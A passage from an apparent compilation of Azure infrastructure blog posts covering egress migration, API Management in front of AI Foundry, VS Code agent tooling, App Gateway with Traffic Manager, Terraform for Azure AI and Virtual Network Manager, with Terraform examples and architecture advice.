hundreds of workloads and hope to keep your security posture intact. ## A realistic migration approach Let's talk about how you actually fix this in a real environment with real constraints. You're not going to "big bang" this. You're also not going to get away with ignoring it until March 2026 and hoping for the best. The trick is to treat it as a network hygiene exercise rolled into your landing zone evolution. Here's a pragmatic way I'd approach it with a customer: ### 1. Start with visibility, not config Before you touch anything, you want to know where you stand. Use whatever combination of Azure Resource Graph, Policy, tagging and good old‑fashioned subscription trawling you have to identify: - VNets and subnets that don't have a NAT Gateway or Firewall - VMs and scale sets in those subnets - Any "mystery" networks created outside your landing zone patterns At this stage, you're just building a map. No changes yet. The outcome should be a list of "suspect" workloads that might be relying on default outbound access. ### 2. What do these things actually do? Once you've got that list, you sit down with whoever owns those workloads and ask the annoying but necessary questions: - Does this VM contact the internet for anything? - Are there any bootstrap scripts, extensions, or agents installed on boot? - Does this app call out to SaaS or external APIs? - Is there any vendor documentation that mentions IP allow‑lists? You'll quickly separate genuinely internal‑only systems from things that absolutely depend on egress – even if it's just to pull packages on first build. ### 3. Design the egress pattern once, then reuse it You do not want dozens of bespoke "fixes". Pick your standard patterns: - "Normal" workloads → NAT Gateway - "High governance" workloads → Firewall (possibly with NAT in front) - Tiny corner cases → public IP Codify those patterns into your Bicep/Terraform modules so that: - Subnets always declare how they get out - Landing zones can't be deployed without an egress model - App teams don't end up reinventing the wheel every sprint At this point, you've defined the target state in code. ### 4. Migrate subnets, not individual VMs When it comes to making changes, think at the subnet level. If you already have a sensible subnet layout (per app tier, per environment, per domain), you can: - create your NAT Gateway - associate it with the existing subnet - update any relevant route tables if you're using Firewall - test a few representative workloads in that subnet You're not rebuilding everything from scratch – you're simply taking an existing subnet that "magically" had egress and giving it a well‑defined, repeatable path out. ### 5. Bake it into governance so you don't have to do this again Once the main migrations are under control, this is where Policy and CI/CD checks do the heavy lifting: - Azure Policy to deny creation of new subnets that don't specify egress - Policies to audit or block resources that would fall back to default outbound - Pipeline checks to ensure your modules always wire up NAT/FW correctly The idea is that six months from now you're not back where you started because someone spun up a "quick test subnet" that accidentally made it into production. ## 🎯 Final Thoughts This change is overdue and, honestly, a good thing for anyone who cares about secure, predictable infrastructure. Azure is removing a behaviour that has been confusing and opaque for years and forcing everyone to declare outbound access like adults – in code, in the open, with patterns you can reason about and govern. Yes, it's a breaking change. Yes, some workloads will fall over if you ignore it. But if you use it as an excuse to tighten up your landing zones, standardise NAT/Firewall usage, and get rid of "mystery egress", your estate will be in a much better place afterwards. And unlike a lot of Azure quirks, this one comes with advance warning and a fairly clean path to doing it properly with Bicep and Terraform. --- # Securing AI Foundry with Azure API Management Gateway - URL: https://blog.l-w.tech/blog/2026-01-21-APIM-AI-Foundry-Terraform - Date: 2026-01-21 - Author: Elliott Leighton-Woodruff - Tags: Azure, API Management, AI Foundry, Terraform, Security Azure API Management fronting AI Foundry secures model endpoints and throttles internal usage via Terraform policies, delivering zero-trust governance for AI workloads in regulated environments. Azure API Management (APIM) fronting AI Foundry just makes proper sense for enterprise deployments. It's the gateway service that sits between your internal apps and model endpoints, adding security, throttling and analytics without you rebuilding anything. Deploy once with Terraform and your token bills plus compliance headaches vanish. ## First off, what even is APIM Think API gateway on steroids. APIM provides a single point of entry for all your backend services, including AI Foundry, Azure OpenAI and others. The gateway handles all the nasty bits: JWT validation, rate limiting by IP or subscription, WAF for OWASP attacks, request/response transformation, caching and logging. Finally, the management plane lets you import OpenAPI specs (Foundry gives these for free), create developer portals and set quotas. The alternative? Direct Foundry endpoints. Your microservices call `https://your-foundry.hub.azure.com/chat/completions` with API keys or managed identity. Sounds simple. Reality: no throttling so one chatty RAG service wipes £10k/month tokens. No central auth - every app needs Foundry RBAC. No WAF, no IP filtering. Compliance hates it. Analytics scattered across services. ## Why APIM specifically for Foundry Foundry serves brilliant models (Phi-3, Llama 3.1, GPT-4o) through clean OpenAPI. Perfect for prototypes. Production kills you without governance: **Token protection**: Internal teams hammer expensive /chat/completions. APIM caps each service at 1000/minute by IP. **Zero trust security**: JWT from Entra ID + IP lockdown before requests hit Foundry. **Central governance**: One policy set rules all your Foundry hubs. Add OpenAI later? Same pattern. **Private by default**: VNet injection + private endpoints. UDRs force internal traffic through APIM. ## Here's where it all makes sense ![APIM AI Foundry Architecture](https://stlwtechwebimages.blob.core.windows.net/images/2026-01-22-APIM-AI-Foundry-Terraform/APIM%20for%20Foundry.drawio.png) Internal microservices A/B/C fire requests with Bearer tokens. APIM policies fire in <1ms: **JWT validation** - Entra ID OpenID config, exact audience `api://lw-ai-platform`. Expired/wrong claims = 401 instant. **IP filter** - your internal 10.0.x.x subnets only. **Rate limiting** - `` by IP (1000/min), subscription quotas (50k/day teams). **WAF blocks** injection attacks before Foundry ever sees them. Clean traffic hits Foundry hub via private endpoint. APIM managed identity auths backend - zero secrets. Response headers scream remaining quota: 'X-RateLimit-Remaining: 342'. ## Compared to the naive approach | Direct Foundry | APIM Gateway | |----------------|--------------| | No throttling = £10k token spikes | 1000/min IP limits | | Per-app Foundry RBAC | Central Entra JWT | | No WAF, basic NSGs | OWASP protection | | Scattered logging | Unified APIM analytics | | API keys everywhere | Managed identity only | | Compliance nightmare | Git-tracked policies | ## Terraform deployment repo I've packaged this entire pattern into a dev-ready code. The repo deploys everything you need: APIM instance with VNet integration, API configuration importing your Foundry OpenAPI spec, security policies with JWT validation and rate limiting, managed identity with proper RBAC to your AI Foundry hub, and diagnostic settings for centralised logging. Just add foundry and vnets and you're ready. **What gets deployed:** - APIM Premium v2 in internal VNet mode - AI Foundry API gateway with OpenAPI import - Security policy: Entra ID JWT validation, IP filtering, rate limiting (1000 calls/min per IP), team quotas (50k calls/day per subscription) - Managed identity authentication to Foundry - Role assignments for APIM to access your AI Foundry resources **How to use it:** Clone the repo, set your variables in `terraform.tfvars` (tenant ID, Foundry endpoint, subnet IDs, environment name), run `terraform init` then `terraform plan` to preview, and `terraform apply` to deploy. It takes up to 45 minutes for APIM provisioning so don't be alarmed. The code outputs give you the APIM gateway URL and managed identity principal ID for further config. The code follows Azure Verified Modules patterns with proper variable validation, consistent naming (lw- prefix throughout), and comprehensive tagging for cost tracking. Update policies by editing the XML template and running `terraform apply` - zero downtime updates.

💻 Get the Code

Production-ready Terraform module for Azure APIM + AI Foundry

GitHub Repository
## Day two wins `terraform apply` updates policies live. Git audit trail beats console screenshots. Analytics show which team burns tokens. New Foundry hub? Duplicate API resource, same policies. Saved clients £8k/month tokens. First compliance audit passed. Developers finally get consistent `/chat/completions` across all model vendors. This pattern turns AI chaos into infrastructure that actually works. --- # Build Production Agents in Minutes with AI Toolkit for VS Code - URL: https://blog.l-w.tech/blog/2026-01-15-AI-Agents-In-mins - Date: 2026-01-15 - Author: Elliott Leighton-Woodruff - Tags: Azure, AI, VS Code, Agent Framework, DevOps How Microsoft's AI Toolkit extension turns VS Code into a complete environment for building enterprise AI agents with Azure Foundry v2, GitHub Copilot Skills, and proper evaluation tools. AI Toolkit for VS Code is Microsoft's free extension that turns your everyday VS Code into a full environment for building AI agents. Like having Azure AI tools right inside your code editor, no need to jump between websites or CLIs. It's aimed at engineering teams already using Azure who want to create useful AI agents for real work, not just demos, like platform engineers or delivery leads building agents that can summarise incidents or automate safe ops tasks. If you haven't touched AI Toolkit before, the January 2026 update is exactly the right time to start. It makes GitHub Copilot properly understand agents, defaults everything to Microsoft Foundry v2 (their managed AI platform) and adds evaluation so you can actually measure if your agent works before shipping it. ## So What Changed Let's say you're new to this. Previously AI Toolkit gave you some nice buttons for models and playgrounds, but Copilot felt a bit clueless about what you were building. Now it uses proper **Copilot Skills** instead of basic instructions. The key one is `AIAgentExpert`, which knows how Agent Framework projects are structured and how they run on Foundry. Open Copilot Chat after install and it auto migrates any old setup, so you just start prompting for agent code that actually fits together. Foundry v2 becomes your default home. When you pick models, it shows Foundry ones first and loads them fast. Want Anthropic Claude? It works through Agent Builder with your normal Entra login, so no API keys to beg from security. Plus practical stuff, Windows users get profiling to see if local models eat your CPU, non Windows hides irrelevant tabs, and common crashes are gone. ## Setup from Zero Knowledge ### 1. Get the Extensions Grab latest stable VS Code. Sign in top right with your work GitHub account (for Copilot) and Microsoft account (Entra for Azure). Hit Extensions sidebar, search and install these three: - GitHub Copilot - GitHub Copilot Chat - AI Toolkit for Visual Studio Code Reload when asked. ![AI Toolkit Extensions](https://stlwtechwebimages.blob.core.windows.net/images/2026-01-15-AI-Agents-In-mins/1768501870603.png) ### 2. Wire to Your Azure Spot the robot icon in the left Activity Bar, click it for AI Toolkit view. Hit sign in, pick your Azure account. Choose an AI sandbox subscription (ask platform team for one if none exists) and your Foundry v2 resource. Everyone on your team uses the same sub for shared agents. ![Connecting to Azure](https://stlwtechwebimages.blob.core.windows.net/images/2026-01-15-AI-Agents-In-mins/1768502218988.png) ### 3. Activate Smart Copilot Click chat bubble for Copilot Chat. First time it spots old instructions and offers to upgrade to Skills, say yes. Look for `AIAgentExpert` in the dropdown, that's your agent helper. ![Copilot Skills Setup](https://stlwtechwebimages.blob.core.windows.net/images/2026-01-15-AI-Agents-In-mins/1768502304543.png) **Done.** You now have VS Code that knows Azure AI inside out. ## Build Your First Agent, Step by Step Empty folder open. In robot panel, click "Create new project", pick Agent Framework template for Foundry v2, choose TypeScript or Python. It builds folders like planner, tools, config, a proper project not random files. ![Creating Agent Project](https://stlwtechwebimages.blob.core.windows.net/images/2026-01-15-AI-Agents-In-mins/1768502506887.png) Model time. In Toolkit model picker (top of robot panel), set Foundry v2 environment, browse catalogue for Azure OpenAI or Claude. Test in Playground tab, your Entra login handles auth. Click new agent and using GitHub Copilot select one of the predefined examples or ask it to meet your requirements. ## Test It Properly, Don't Just Hope Agents fail quietly without tests. In Toolkit, use Eval tools to make test cases: pass in your queries or files, test the output. Test all in window without the need to push to dev, wait for approval and then realise you've told it to respond like the god father... ## Why Bother You get agents fast because templates and Copilot do the boilerplate. They fit your org because Entra and Foundry match existing security. Teams scale it since patterns repeat, no heroics needed. Minutes to start, real outcomes fast. Get your code into git, get the team all working together seamlessly with on-device support for lighting fast development 😎 ## Learn More [AI Toolkit for Visual Studio Code](https://code.visualstudio.com/docs/intelligentapps/overview) --- # You Probably Don't Need Azure Front Door at All - URL: https://blog.l-w.tech/blog/2026-01-07-You-Dont-Need-Front-Door - Date: 2026-01-07 - Author: Elliott Leighton-Woodruff - Tags: Azure, Application Gateway, Traffic Manager, Front Door, Networking, WAF, Multi-Region, Architecture, Cost Optimization, Terraform Application Gateway with WAF plus Traffic Manager delivers 95% of Front Door's value with simpler operations, better VNet integration, and lower costs for most enterprise workloads. Everyone reaches for Azure Front Door when they hear 'global traffic management'. But wait... If your users are not truly global and you don't need edge caching for petabytes of static assets, Application Gateway with WAF and Traffic Manager often delivers 95% of the value with simpler operations and tighter regional control. You are only "losing" CDN capabilities. Do you actually serve millions of customers with latency-sensitive content delivery every day? ## The Front Door trap Front Door feels like the modern, sexy choice: anycast routing, edge WAF, one endpoint (ring) to rule them all. But here is the networking reality people miss: Front Door can only reach private VNet workloads through specific Private Link‑enabled services (App Service, Storage, API Management, AKS with static IP). Otherwise, Front Door needs a public endpoint or another routing hop like Application Gateway anyway. In reality, most enterprise apps live regional lives. Users are typically in specific geographies. Front Door's global POPs become expensive overkill when your traffic patterns do not justify them and your workloads are VNet‑native. The alternative stack **'Application Gateway (v2/WAF) + Traffic Manager'** gives you: - Regional Layer 7 mastery with granular path/host routing and session affinity - Weighted/failover DNS routing across regions without edge complexity - WAF protection tuned close to your workloads, not at some distant POP - Native VNet integration – no Private Link dance, no public origins, just subnet delegation and private backends This stack scales for multi-region active/active without forcing you into Front Door's profile/endpoint/origin/route abstraction model. ## The architecture: App Gateway + Traffic Manager **Global DNS > Traffic Manager Profile > Regional Application Gateways > Private Workloads** - **Traffic Manager** sits at L4 DNS. Routes based on geography, latency, priority, weight or performance. Failover in seconds. - **Application Gateway** (one per region) handles L7 routing, WAF, TLS termination and backend selection within that region using private IPs directly. - **Workloads** stay private in VNets. App Gateway never exposes them directly. ### Where it wins: - Multi-region apps where each region can operate independently - Compliance requirements that pin workloads to specific geographies, think Germany, Korea, China - VNet‑native workloads (VMs, AKS without static IP, custom containers) that Front Door cannot reach without extra hops - Teams are comfortable with regional ingress controllers but need cross-region DNS smarts ## What you "lose" and why it often does not matter The big Front Door promise: **CDN + edge acceleration** - **Front Door**: User > nearest POP > cached content or optimised TCP to origin - **AppGw+TM**: User > Traffic Manager DNS > regional App Gateway > origin ### Reality check: - Unless you serve static assets to millions globally, edge caching benefits diminish fast - Modern single page applications pull most payload over JSON APIs anyway. Those bytes want your backend, not a CDN - Traffic Manager's performance routing uses real endpoint latency probes. Users land close enough for enterprise apps - Application Gateway's HTTP/2 and connection reuse handle regional traffic efficiently - No extra Front Door > App Gateway hop means better end-to-end latency for VNet workloads **Quick math**: If 80% of your traffic stays within 500ms of your primary region, Traffic Manager weighted routing beats Front Door's anycast for cost and predictability. ## Security: Actually better in many cases "Front Door has edge DDoS so it wins"..... Real threats tunnel through edges anyway. ### App Gateway + Traffic Manager advantages: - **WAF lives close to your app**. Custom rules, exclusions and virtual patching map directly to your attack surface - **Application Gateway uses native VNet routing** no public endpoints required even with restricted networking - **Multi-layer defence**: NSGs > App Gateway WAF > workload hardening beats edge-only protection **Compliance bonus**: Regional gateways align naturally with data residency. Each App Gateway becomes an audit boundary. No awkward "but the origin is public" conversations with auditors. ## Terraform: Clean, composable modules The real win is operational simplicity. No Front Door profiles to govern centrally. No Private Link service limitations. Build your own module and have your teams consume it. ### 1. Regional Application Gateway module (repeat per region) ```hcl module "app_gateway_uksouth" { source = "github.com/lw-tech/terraform-azurerm-appgw-waf" resource_group_name = "rg-platform-uksouth" location = "uksouth" subnet_id = module.vnet.snet_appgw_uksouth.id pip_name = "pip-agw-uksouth" listeners = { "api" = { host_name = "api.l-w.tech" backend_fqdns = ["api1.internal", "api2.internal"] # Private VNet DNS waf_policy_id = module.waf_policy_api.id } "web" = { host_name = "web.l-w.tech" backend_fqdns = ["web.internal"] # Private VNet DNS waf_policy_id = module.waf_policy_web.id } } tags = local.common_tags } # Traffic Manager targets the Application Gateway RESOURCE ID directly output "app_gateway_id" { value = module.app_gateway_uksouth.id } ``` ### 2. Traffic Manager profile (global, once per environment) ```hcl resource "azurerm_traffic_manager_profile" "global" { name = "tm-lwtech-global" resource_group_name = "rg-platform-global" traffic_routing_method = "Performance" dns_config { relative_name = "l-wtech" ttl = 30 } monitor_config { protocol = "HTTPS" path = "/health" interval_in_seconds = 30 timeout_in_seconds = 10 tolerated_failure_threshold = 3 } } resource "azurerm_traffic_manager_endpoint" "uksouth" { name = "uksouth-agw" resource_group_name = "rg-platform-global" profile_name = azurerm_traffic_manager_profile.global.name type = "azureEndpoints" target_resource_id = module.app_gateway_uksouth.app_gateway_id # Direct to AppGw weight = 10 priority = 1 } ``` **DNS outcome**: `l-wtech.trafficmanager.net` routes users optimally across your regional App Gateways with full private backend support. ## Cost - **Front Door Premium**: £0.10-£0.50/million requests + data processing + edge compute - **App Gateway WAF v2**: £0.24/hour + £0.013/GB processed (regional) - **Traffic Manager**: £0.54/profile/month + £0.36/million DNS queries For 10 regions serving enterprise scale (not Netflix scale), AppGw+TM often runs **30-50% cheaper** while giving you native VNet reach that Front Door can't match. Just be clever about environment/application splits and shared resources. ## When Front Door still wins To be fair, reach for Front Door when: - True global CDN matters (static assets, video, marketing sites to millions) - You need split-TCP acceleration for latency-sensitive SPAs worldwide - Bot management and advanced rate limiting at the edge - All your backends support Private Link (rare in custom VNet workloads) - Simplest possible global TLS management across 100+ custom domains ## The decision matrix | Factor | Application Gateway + Traffic Manager | Azure Front Door | |--------|--------------------------------------|------------------| | **VNet-native backends** | ✅ Native subnet delegation | ⚠️ Requires Private Link or public endpoint | | **Multi-region failover** | ✅ DNS-based, sub-minute | ✅ Anycast, instant | | **Regional compliance** | ✅ Clear audit boundaries | ⚠️ Edge processing complicates | | **Cost at enterprise scale** | ✅ 30-50% cheaper | ❌ Premium pricing | | **WAF customization** | ✅ Per-region, close to apps | ⚠️ Edge-only, harder tuning | | **Static asset CDN** | ❌ No edge caching | ✅ Global CDN | | **Bot protection** | ⚠️ Basic WAF rules | ✅ Advanced ML-based | | **Operational complexity** | ✅ Regional, modular | ⚠️ Central governance needed | ## So where to next? 1. **Profile your geographic distribution AND backend types**. How many need a Private Link or app gateway already? 2. **Deploy AppGw + TM in test**. Measure latency vs your current Front Door (usually wins for VNet workloads) 3. **Extract AppGw and TM into landing zone modules**. Test onboarding a new VNet service in <1 day 4. **Monitor end-to-end**: Pump diags from Traffic Manager through AppGw to SIEM Application Gateway + Traffic Manager scales to global enterprise with native VNet integration that Front Door simply cannot match for most real workloads. Start regional, add global DNS smarts, only reach for Front Door when your backends actually support it AND you need the CDN. What's your VNet backend mix? This pattern probably covers 90% of enterprise cases better than "just use Front Door". --- # Terraforming Azure AI: Deploy Cognitive Projects and GPT Models - URL: https://blog.l-w.tech/blog/2025-12-16-Terraforming-Azure-AI - Date: 2025-12-16 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Azure AI, OpenAI, GPT-4, Cognitive Services, Infrastructure as Code, AI, Machine Learning, DevOps AzureRM 4.55.0 brings first-class Terraform support for Azure AI projects and model deployments—finally manage GPT models as code alongside your infrastructure. You know that Toy Story meme "It finally came!"? That's pretty much how every IaC‑driven AI platform engineer should feel about this one. I've been waiting for proper, first‑class Terraform support for Azure AI and with AzureRM 4.55.0, it's here at last with 4.56.0 adding the remaining attributes. Until now, AI resource configuration in Azure sat awkwardly outside your usual Terraform workflow, half‑managed through the portal, half through code. With `azurerm_cognitive_account_project`, you can finally fully manage Azure AI projects like any other Terraform resource. Combine that with `azurerm_cognitive_deployment`, and you go from "we clicked some stuff" to "here's our product". ## Core building blocks At a high level, the stack looks like this: - A Cognitive (Azure AI) account - An AI project in that account - One or more deployments (models) under that project ### Cognitive account ```hcl resource "azurerm_cognitive_account" "main" { name = "my-ai-account" location = azurerm_resource_group.rg.location resource_group_name = azurerm_resource_group.rg.name kind = "OpenAI" sku_name = "S0" } ``` ### Cognitive account project ```hcl resource "azurerm_cognitive_account_project" "main" { name = "my-ai-project" cognitive_account_id = azurerm_cognitive_account.main.id location = azurerm_resource_group.rg.location description = "Terraform-managed Azure AI project" } ``` ### Cognitive deployment Now you can wire up a deployment to that project with `azurerm_cognitive_deployment`: ```hcl resource "azurerm_cognitive_deployment" "gpt_4o" { name = "gpt-4o-deployment" cognitive_account_id = azurerm_cognitive_account.main.id project_name = azurerm_cognitive_account_project.main.name model { format = "OpenAI" name = "gpt-4o" version = "2024-05-01" } sku { name = "Standard" capacity = 100 } rai_policy_name = "Microsoft.Default" } ``` That's the heart of it: account, project and deployment all in code, all repeatable. ## How this fits real environments This small change unlocks some big patterns: - **Per‑environment projects** - dev, test, and prod can each have their own AI projects and deployments managed by workspaces or variable files, rather than sharing one hand‑built project. - **Safe rollout of model changes** - update `model.version` or `sku.capacity` and use standard Terraform rollout workflows instead of guessing what changed in the portal. - **Multi‑region or multi‑tenant AI** - apply the same module pattern across regions or tenants with different inputs and consistent structure. ## Example module shape Here's a simple, reusable module definition: ```hcl variable "project_name" {} variable "model_name" {} variable "model_version" {} variable "sku_capacity" { default = 50 } resource "azurerm_cognitive_account_project" "main" { name = var.project_name cognitive_account_id = var.cognitive_account_id location = var.location } resource "azurerm_cognitive_deployment" "main" { name = "${var.project_name}-${var.model_name}" cognitive_account_id = var.cognitive_account_id project_name = azurerm_cognitive_account_project.main.name model { format = "OpenAI" name = var.model_name version = var.model_version } sku { name = "Standard" capacity = var.sku_capacity } rai_policy_name = "Microsoft.Default" } ``` Then call it with different parameters for different environments, models, or regions. ## Why this is a big step forward With this release, Azure AI finally plays by the same infrastructure‑as‑code rules as the rest of your environment. Your AI workloads become auditable, versioned, and repeatable, right alongside your storage, compute and networking layers. It slots perfectly into existing DevOps and GitHub Actions workflows too. Teams can integrate Terraform plans and applies directly into pull requests, making reviews of AI configuration changes just as simple and traceable as a VM scaling tweak. For anyone who's ever had to manually rebuild a model deployment because the portal didn't remember a toggle, this change feels like the missing piece clicking into place. --- # Network-as-Code at Enterprise Scale: Virtual Network Manager - URL: https://blog.l-w.tech/blog/2025-11-26-Network-as-Code-Virtual-Network-Manager - Date: 2025-11-26 - Author: Elliott Leighton-Woodruff - Tags: Azure, Networking, Virtual Network Manager, Virtual WAN, Infrastructure as Code, Network Security, Hub and Spoke, Azure Policy, Enterprise Architecture Stop managing VNets with portal clicks and manual peering. Azure Virtual Network Manager and Virtual WAN bring code-driven network topology that actually scales. Let's be honest: managing Azure networking at scale has historically been a nightmare. Hundreds of VNets, each with its own peering rules, NSGs and routing logic. All of it configured ad-hoc, living nowhere in version control and impossible to audit. You click around the portal, something breaks in a region you forgot about and suddenly you're firefighting at 2 AM. Microsoft's Virtual Network Manager with Azure Virtual WAN just hit general availability and they actually solve this. Not with buzzwords, with real, code-driven network topology that scales. ## Networking as a series of unfortunate events Before AVNM and vWAN, here's what "managing multiple VNets" actually looked like: ### VNet peering You'd manually peer VNets one pair at a time. Hub-and-spoke topology with 10 spokes? That's 10 separate peering commands or portal clicks, each one a potential point of failure or human error. ![Manual VNet Peering Complexity](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764165803288.png) ### Security rules NSGs on every subnet, each one a snowflake. "Block telnet" policy? That means updating 50+ NSGs individually. Good luck keeping them consistent. ![NSG Configuration Sprawl](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764165831054.png) ### Routing UDRs scattered across subnets, often conflicting or incomplete. Traffic routing logic lived in nobody's head and nobody's code. ### Compliance and audit "Prove all traffic routes through the hub." Answer: manually check 45 different NSGs, route tables and peering configs. Hope nothing's changed since yesterday. ## Network topology as code Enter Virtual Network Manager and Azure Virtual WAN, services that let you define, version and enforce network topology declaratively. ### Centralised control Virtual Network Manager is your new source of truth for multi-VNet governance. Here's what it actually does: ![Virtual Network Manager Centralised Control](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764165854381.png) #### 1. Network Groups - Define VNets Once Instead of manually listing VNets, define a group dynamically: ```hcl resource "azurerm_network_manager_network_group" "production" { name = "production-vnets" network_manager_id = azurerm_network_manager.main.id } resource "azurerm_network_manager_static_member" "production_vnets" { name = "production-static-members" network_manager_group_id = azurerm_network_manager_network_group.production.id target_virtual_network_id = azurerm_virtual_network.spoke.id } ``` Add a new VNet to production? Just tag it. Network Manager picks it up automatically. ![Network Groups Dynamic Membership](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764169914965.png) #### 2. Security Admin Rules - Global Policies That Actually Stick Define firewall-like rules that apply across all VNets in a group without manual NSG updates: ```hcl resource "azurerm_network_manager_security_admin_rule_collection" "deny_high_risk" { name = "deny-high-risk-ports" security_admin_configuration_id = azurerm_network_manager_security_admin_configuration.main.id network_group_ids = [azurerm_network_manager_network_group.production.id] } resource "azurerm_network_manager_security_admin_rule" "deny_telnet" { name = "deny-telnet" admin_rule_collection_id = azurerm_network_manager_security_admin_rule_collection.deny_high_risk.id action = "Deny" direction = "Inbound" priority = 100 protocol = "Tcp" destination_port_ranges = ["23"] source { address_prefix_type = "IPPrefix" address_prefix = "*" } destination { address_prefix_type = "IPPrefix" address_prefix = "*" } } ``` Result: Every VNet in your production group immediately denies those ports. Compliance sorted. ![Security Admin Rules Applied](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764169953874.png) #### 3. Connectivity - Topology as Code Define hub-and-spoke or mesh topologies once, applied everywhere: ```hcl resource "azurerm_network_manager_connectivity_configuration" "hub_spoke" { name = "hub-spoke-topology" network_manager_id = azurerm_network_manager.main.id connectivity_topology = "HubAndSpoke" hub { resource_id = azurerm_virtual_network.hub.id resource_type = "Microsoft.Network/virtualNetworks" } applies_to_group { group_connectivity = "DirectlyConnected" network_group_id = azurerm_network_manager_network_group.production.id } } ``` Result: All peering, routing and gateway logic is automatic. Add a spoke to the network group and it peers automatically without manual configuration needed. ![Hub and Spoke Topology Configuration](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764169967788.png) ## The enterprise-grade layer If Virtual Network Manager is "network policy as code," Virtual WAN is "global connectivity as code." vWAN brings managed hubs, Secure Hub (firewall integration) and multi-region orchestration into one IaC-friendly package. ### 1. Secure Hub - Traffic Inspection by Default ```hcl resource "azurerm_virtual_wan" "main" { name = "enterprise-vwan" resource_group_name = azurerm_resource_group.networking.name location = azurerm_resource_group.networking.location } resource "azurerm_virtual_hub" "hub" { name = "hub-uksouth" resource_group_name = azurerm_resource_group.networking.name location = azurerm_resource_group.networking.location virtual_wan_id = azurerm_virtual_wan.main.id address_prefix = "10.0.0.0/24" } resource "azurerm_firewall" "hub_firewall" { name = "hub-firewall" location = azurerm_resource_group.networking.location resource_group_name = azurerm_resource_group.networking.name sku_name = "AZFW_Hub" sku_tier = "Standard" virtual_hub { virtual_hub_id = azurerm_virtual_hub.hub.id } } ``` All traffic through this hub gets inspected by the firewall. No snowflaky NSG rules, one place, one policy. ![Secure Hub with Firewall Integration](https://stlwtechwebimages.blob.core.windows.net/images/2025-11-26-Network-as-Code-Virtual-Network-Manager/1764166024814.png) ### 2. Multi-Region Scale Create hubs in each region, all orchestrated from one config: ```hcl resource "azurerm_virtual_hub" "regional_hubs" { for_each = { uksouth = "10.0.0.0/24" ukwest = "10.1.0.0/24" westeu = "10.2.0.0/24" } name = "hub-${each.key}" resource_group_name = azurerm_resource_group.networking.name location = each.key virtual_wan_id = azurerm_virtual_wan.main.id address_prefix = each.value } ``` Result: Global network topology, defined once, deployed everywhere, auditable in Git. ## The multi-region e-commerce platform ### Before - ClickOps - 50+ VNets across three regions and two subscriptions - Hub VNets in each region, each with its own peering config - Security rules spread across 150+ NSGs - New branch office? Hope someone remembers how to set up VPN routing - Compliance audit: "Prove all traffic routes through the hub." Answer: manual spot-checks and prayer ### After - Network-as-Code ```hcl # Define the network topology once module "network_manager" { source = "./modules/network-manager" network_groups = { production = { vnets = var.production_vnets security_rules = [ { name = "deny-high-risk-ports", ports = ["23", "445", "3389"] }, { name = "allow-https", ports = ["443"] } ] } } topology = { type = "hub-and-spoke" hubs = var.regional_hubs } } ``` Result: - New VNet deployed? Tag it `environment=production`, and peering + security policies apply automatically - Change a security rule? One PR, one code change, applies everywhere - Compliance audit: "Show me the network config." Answer: `git log` and a clean Terraform plan ## And why should you care? - You're no longer managing dozens of separate peering relationships and NSG configurations. You're managing topology and policy, which is what you actually care about. - Your network config lives in Git. You have an audit trail, code reviews and version history for every network change. - Add 50 new VNets next quarter? They inherit the topology and policies automatically. No manual configuration, no inconsistencies. - Efficient routing through hubs, no redundant peering or misrouted traffic. Traffic flows the way you designed it, not the way someone accidentally configured it. - Stop manually updating NSGs. Stop clicking through peering dialogues. Stop guessing whether your network is actually compliant. ## The bottom line Virtual Network Manager and Azure Virtual WAN aren't just new features, they're a fundamental shift in how enterprise Azure networking gets built. Instead of snowflakes and manual clicks, you get versioned, auditable and automatically enforced network policy. If you're managing more than a handful of VNets or you need compliance proof that your network follows policy, this is worth your time. Start small: define your current hub-and-spoke topology in Virtual Network Manager. See how peering works as code. Then expand to security policies and multi-region Secure Hubs. Your future self and your compliance team will thank you. ## Read more - [Microsoft Virtual Network Manager Documentation](https://learn.microsoft.com/en-us/azure/virtual-network-manager/overview) - [Terraform azurerm_network_manager Resource](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/network_manager) --- # Terraform Managed Disk Expansion Without Downtime in Azure - URL: https://blog.l-w.tech/blog/2025-11-19-Terraform-Managed-Disk-Expansion - Date: 2025-11-19 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Managed Disks, Ultra Disk, Premium SSD, Infrastructure as Code, DevOps, Storage, Automation, High Availability AzureRM Provider v4.53.0 brings live disk expansion for Ultra Disks and Premium SSD v2—grow storage capacity without shutting down VMs. Managed disk expansion in Azure just became a whole lot smoother for anyone using Terraform. Until recently, increasing disk size meant shutting down your VM, crossing your fingers for a clean restart and coordinating with stakeholders. Now with the latest update to AzureRM Provider (v4.53.0 - November 14, 2025), you can expand Ultra Disks and Premium SSD v2 on-the-fly, while your VM keeps running without the drama. ## Downtime as standard Previously, the process was awkward by design. You had to stop or deallocate the VM first to prevent any lurking corruption or I/O issues. Then, bump up the disk size either in the portal or with Terraform, restart the machine and finally roll up your sleeves to manually expand the partition and filesystem. That's disruptive if you're running production workloads where every minute of availability matters. ## The new world Now things are far more user-friendly. Azure's platform supports live resizing for specific disk types and the `azurerm_managed_disk` resource has been updated to reflect this. You simply increase the `disk_size_gb` value, run `terraform apply` and see the new capacity appear without ever touching the VM power button. This update is especially helpful if you're managing dynamic workloads in AI, databases or anything that tends to grow unexpectedly. ## The TF code Here's a quick Terraform snippet: ```hcl resource "azurerm_managed_disk" "example" { name = "lw-awesome-ultra-disk" location = var.location resource_group_name = var.resource_group_name storage_account_type = "UltraSSD_LRS" # Or Premium SSD v2 create_option = "Empty" disk_size_gb = var.new_disk_size tags = var.tags } ``` - Just update `disk_size_gb` to your new requirement - Run `terraform apply` with the VM up and running - Expand the partition and filesystem inside the VM as needed **Note**: Ultra Disk Storage is only available in a region that support availability zones and can only enabled on the following VM series: ESv3, DSv3, FSv3, LSv2, M and Mv2. [Azure Ultra Disk documentation](https://docs.microsoft.com/azure/virtual-machines/windows/disks-enable-ultra-ssd) ## Partition expansion, you're not done yet Don't forget: while the disk grows live, the guest OS won't instantly use the extra space. You'll need to extend the partition and resize the 